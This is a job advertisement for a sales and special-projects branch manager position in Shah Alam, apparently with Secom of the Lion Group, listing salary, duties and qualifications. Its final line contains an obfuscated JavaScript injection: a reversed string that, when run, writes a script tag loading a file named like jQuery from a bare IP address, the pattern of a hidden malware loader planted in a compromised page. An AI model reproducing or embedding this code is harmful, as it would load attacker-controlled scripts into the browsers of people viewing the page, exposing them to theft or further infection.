Location: Shah Alam, Selangor
Salary : RM 5,500 – RM 7,000
– To prepare the business plan and budget by monthly basis. Reviewing the progress of the team and deciding the direction of the Special project Division.
– To indentify & target list of notable customer accounts and manage accounts that secured
– To meet the business plan and budget. Focus on the Sales target and develop an intensive plan to achieve.
– To protect the current customer base and expand the sales to increase the company market share. Guide and coach the subordinate in Special Project Division to ensure they are able to hit the sales and project target.
– To administer the branch to comply with ISO 9001 and other Standard Operating Procedure (SOP) as set by the Company.
– To prepare monthly branch report on the business and marketing activities. Setting the target for Special Project Division
– To organize weekly staff meeting at the branch with proper agenda and submit the minutes to HQ. Brainstorm to come out the new perspective of sales and marketing in objective to obtain the project/business.
– To attend customer complaints and break-ins whenever necessary
– To protect the reputation and image of Secom as well maintaining a high ethical standards and comply with the Company and Lion Group rules and regulations
– Other assignments given by the company of the Lion Group from time to time.
– Degree in Marketing or other discipline
– 5 years exposure in the same capacity document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))